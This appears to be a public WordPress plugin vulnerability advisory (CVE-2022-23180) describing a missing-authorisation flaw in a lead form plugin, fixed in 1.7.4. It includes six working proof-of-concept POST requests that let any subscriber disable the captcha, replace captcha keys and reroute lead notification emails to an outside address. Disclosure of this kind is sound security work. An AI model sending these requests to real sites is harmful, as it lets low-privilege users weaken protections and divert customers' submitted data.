WordPress Plugin Vulnerabilities

Contact Form & Lead Form Elementor Builder Plugin < 1.7.4 - Multiple Subscriber+ Settings Update

Description

The plugin doesn't have authorisation and nonce checks, which could allow any authenticated users, such as subscriber to update and change various settings

Proof of Concept

PoC POST Request (ON/OFF Captcha):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-on-off-setting=ON&captcha_on_off_form_id=2&action=SaveCaptchaOption


PoC POST Request (Captcha Settings: Site Key & Secret Key):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-setting-sitekey=YoruOni&captcha-setting-secret=YoruOni&captcha-keys=1&action=SaveCaptchaSettings


PoC POST Request (Lead Receiving Method):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

data-recieve-method=3&action-lead-setting=1&action=SaveLeadSettings


PoC POST Request (User Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

user_email_setting%5Bfrom%5D=yoruoni%40pm.me&user_email_setting%5Bheader%5D=New+Lead+Received&user_email_setting%5Bsubject%5D=Received+a+lead&user_email_setting%5Bmessage%5D=Form+Submitted+Successfully&user-email-setting-option=OFF&user_email_setting%5Bform-id%5D=1&action=SaveUserEmailSettings


PoC POST Request (Admin Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

email_setting%5Bto%5D=yoruoni%40pm.me&email_setting%5Bmultiple%5D=&email_setting%5Bfrom%5D=admin%40x14.tv&email_setting%5Bheader%5D=New+Lead+Received&email_setting%5Bsubject%5D=Form+Leads&email_setting%5Bmessage%5D=%5Blf-new-form-data%5D&email_setting%5Bform-id%5D=1&action=SaveEmailSettings


PoC POST Request (Remember this Form):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

form_id=1&action=RememberMeThisForm

Affects Plugins

Plugin icon
lead-form-builder
Fixed in 1.7.4

References

CVE
CVE-2022-23180
URL
https://plugins.trac.wordpress.org/changeset/2670484

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Yoru Oni
Submitter
Yoru Oni
Submitter website
https://profiles.wordpress.org/yoruoni
Verified
Yes
WPVDB ID
da87358a-3a72-4cf7-a2af-a266dd9b4290

Timeline

Publicly Published
2022-02-01 (about 2 years ago)
Added
2022-02-01 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2023-09-05
Title
Carousel Slider < 2.2.3 - Missing Authorization
Published
2022-02-15
Title
Relevanssi - Subscriber+ Unauthorised AJAX Calls
Published
2023-10-04
Title
Customer Reviews for WooCommerce < 5.36.1 - Missing Authorization
Published
2024-04-16
Title
Popup Anything < 2.8.1 - Missing Authorization
Published
2023-12-27
Title
Stylish Price List < 7.0.18 - Missing Authorization